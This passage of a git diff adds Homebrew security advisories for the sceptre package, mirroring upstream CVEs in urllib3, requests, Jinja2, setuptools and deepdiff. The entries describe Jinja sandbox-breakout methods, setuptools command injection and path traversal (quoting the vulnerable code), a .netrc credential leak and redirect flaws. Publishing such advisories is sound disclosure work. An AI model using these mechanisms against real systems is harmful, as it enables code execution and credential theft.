"resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects", + "details": "When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.\n\nHowever, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.\n\nBecause this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.\n\nUsers should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support.\n* Not disabling HTTP redirects.\n* Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.\n\n## Remediation\n\n* Using the `Proxy-Authorization` header with urllib3's `ProxyManager`.\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Proxy-Authorization` header.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/accff72ecc2f6cf5a76d9570198a93ac7c90270e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240822-0003" + }, + { + "type": "WEB", + "url": "https://www.vicarius.io/vsociety/posts/proxy-authorization-header-handling-vulnerability-in-urllib3-cve-2024-37891" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-47081.json b/advisories/BREW-sceptre-CVE-2024-47081.json new file mode 100644 index 00000000000..282b822abee --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-47081.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-47081", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-9hjg-9r4m-mvj7", + "CVE-2024-47081", + "PYSEC-2026-1872" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.32.4", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Requests vulnerable to .netrc credentials leak via malicious URLs", + "details": "### Impact\n\nDue to a URL parsing issue, Requests releases prior to 2.32.4 may leak .netrc credentials to third parties for specific maliciously-crafted URLs.\n\n### Workarounds\nFor older versions of Requests, use of the .netrc file can be disabled with `trust_env=False` on your Requests Session ([docs](https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env)).\n\n### References\nhttps://github.com/psf/requests/pull/6965\nhttps://seclists.org/fulldisclosure/2025/Jun/2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47081" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/pull/6965" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2025/Jun/2" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2025/Jun/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/06/03/11" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/06/03/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/06/04/1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/06/04/6" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-56201.json b/advisories/BREW-sceptre-CVE-2024-56201.json new file mode 100644 index 00000000000..0c34bfdb9a2 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-56201.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-56201", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-gmj6-6f8f-6699", + "CVE-2024-56201", + "PYSEC-2026-1472" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.5", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja has a sandbox breakout through malicious filenames", + "details": "A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja's sandbox is used.\n\nTo exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56201" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/issues/1792" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/releases/tag/3.1.5" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-56326.json b/advisories/BREW-sceptre-CVE-2024-56326.json new file mode 100644 index 00000000000..700e95f0e19 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-56326.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-56326", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-q2x7-8rv6-6q7h", + "CVE-2024-56326", + "PYSEC-2026-1475" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.5", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja has a sandbox breakout through indirect reference to format method", + "details": "An oversight in how the Jinja sandboxed environment detects calls to `str.format` allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja's sandbox does catch calls to `str.format` and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's `format` method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56326" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/releases/tag/3.1.5" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-6345.json b/advisories/BREW-sceptre-CVE-2024-6345.json new file mode 100644 index 00000000000..8eca3c1f12a --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-6345.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-6345", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-cx63-2mw6-8hw5", + "BIT-setuptools-2024-6345", + "CVE-2024-6345", + "PYSEC-2026-1918" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "70.0.0", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@83.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools vulnerable to Command Injection via package URL", + "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/pull/4332" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-27516.json b/advisories/BREW-sceptre-CVE-2025-27516.json new file mode 100644 index 00000000000..8380ecbbfb2 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-27516.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-27516", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-cpwx-vrp4-4pq7", + "CVE-2025-27516", + "PYSEC-2026-1471" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.6", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja2 vulnerable to sandbox breakout through attr filter selecting format method", + "details": "An oversight in how the Jinja sandboxed environment interacts with the `|attr` filter allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja's sandbox does catch calls to `str.format` and ensures they don't escape the sandbox. However, it's possible to use the `|attr` filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the `|attr` filter no longer bypasses the environment's attribute lookup.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27516" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00045.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-47273.json b/advisories/BREW-sceptre-CVE-2025-47273.json new file mode 100644 index 00000000000..f45248b4ea2 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-47273.json @@ -0,0 +1,106 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-47273", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-5rjg-fvgr-3xxf", + "BIT-setuptools-2025-47273", + "CVE-2025-47273", + "PYSEC-2025-49" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "78.1.1", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@83.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools has a path traversal vulnerability in PackageIndex.download that leads to Arbitrary File Write", + "details": "### Summary \nA path traversal vulnerability in `PackageIndex` was fixed in setuptools version 78.1.1\n\n### Details\n```\n def _download_url(self, url, tmpdir):\n # Determine download filename\n #\n name, _fragment = egg_info_for_url(url)\n if name:\n while '..' in name:\n name = name.replace('..', '.').replace('\\\\', '_')\n else:\n name = \"__downloaded__\" # default if URL has no path contents\n\n if name.endswith('.[egg.zip](http://egg.zip/)'):\n name = name[:-4] # strip the extra .zip before download\n\n --> filename = os.path.join(tmpdir, name)\n```\n\nHere: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88\n\n`os.path.join()` discards the first argument `tmpdir` if the second begins with a slash or drive letter.\n`name` is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of '..' with '.', it is insufficient.\n\n### Risk Assessment\nAs easy_install and package_index are deprecated, the exploitation surface is reduced.\nHowever, it seems this could be exploited in a similar fashion like https://github.com/advisories/GHSA-r9hx-vwmv-q579, and as described by POC 4 in https://github.com/advisories/GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index.\n\n### Impact\nAn attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context.\n\n### References\nhttps://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5\nhttps://github.com/pypa/setuptools/issues/4946", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47273" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/issues/4946" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-50181.json b/advisories/BREW-sceptre-CVE-2025-50181.json new file mode 100644 index 00000000000..1e48389848f --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-50181.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-50181", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-pq67-6m6q-mj2v", + "CVE-2025-50181", + "PYSEC-2026-1999" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.5.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation", + "details": "urllib3 handles redirects and retries using the same mechanism, which is controlled by the `Retry` object. The most common way to disable redirects is at the request level, as follows:\n\n```python\nresp = urllib3.request(\"GET\", \"https://httpbin.org/redirect/1\", redirect=False)\nprint(resp.status)\n# 302\n```\n\nHowever, it is also possible to disable redirects, for all requests, by instantiating a `PoolManager` and specifying `retries` in a way that disable redirects:\n\n```python\nimport urllib3\n\nhttp = urllib3.PoolManager(retries=0) # should raise MaxRetryError on redirect\nhttp = urllib3.PoolManager(retries=urllib3.Retry(redirect=0)) # equivalent to the above\nhttp = urllib3.PoolManager(retries=False) # should return the first response\n\nresp = http.request(\"GET\", \"https://httpbin.org/redirect/1\")\n```\n\nHowever, the `retries` parameter is currently ignored, which means all the above examples don't disable redirects.\n\n## Affected usages\n\nPassing `retries` on `PoolManager` instantiation to disable redirects or restrict their number.\n\nBy default, requests and botocore users are not affected.\n\n## Impact\n\nRedirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable.\n\n## Remediation\n\nYou can remediate this vulnerability with the following steps:\n\n * Upgrade to a patched version of urllib3. If your organization would benefit from the continued support of urllib3 1.x, please contact [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com) to discuss sponsorship or contribution opportunities.\n * Disable redirects at the `request()` level instead of the `PoolManager()` level.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-50182.json b/advisories/BREW-sceptre-CVE-2025-50182.json new file mode 100644 index 00000000000..5312afc1f90 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-50182.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-50182", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-48p4-8xcf-vxj5", + "CVE-2025-50182", + "PYSEC-2026-1997" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.5.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3 does not control redirects in browsers and Node.js", + "details": "urllib3 [supports](https://urllib3.readthedocs.io/en/2.4.0/reference/contrib/emscripten.html) being used in a Pyodide runtime utilizing the [JavaScript Fetch API](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API) or falling back on [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest). This means you can use Python libraries to make HTTP requests from your browser or Node.js. Additionally, urllib3 provides [a mechanism](https://urllib3.readthedocs.io/en/2.4.0/user-guide.html#retrying-requests) to control redirects.\n\nHowever, the `retries` and `redirect` parameters are ignored with Pyodide; the runtime itself determines redirect behavior.\n\n\n## Affected usages\n\nAny code which relies on urllib3 to control the number of redirects for an HTTP request in a Pyodide runtime.\n\n\n## Impact\n\nRedirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects may remain vulnerable if a Pyodide runtime redirect mechanism is unsuitable.\n\n\n## Remediation\n\nIf you use urllib3 in Node.js, upgrade to a patched version of urllib3.\n\nUnfortunately, browsers provide no suitable way which urllib3 can use: `XMLHttpRequest` provides no control over redirects, the Fetch API returns `opaqueredirect` responses lacking data when redirects are controlled manually. Expect default browser behavior for redirects.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-58367.json b/advisories/BREW-sceptre-CVE-2025-58367.json new file mode 100644 index 00000000000..d7fd43f46b0 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-58367.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-58367", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-mw26-5g2v-hqw3", + "CVE-2025-58367", + "PYSEC-2026-327" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "8.6.1", + "resource": "deepdiff", + "resource_purl": "pkg:pypi/deepdiff@8.6.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "deepdiff", + "subject_version": "8.6.2", + "key": "pkg:pypi/deepdiff@8.6.2", + "resource": "deepdiff" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "deepdiff", + 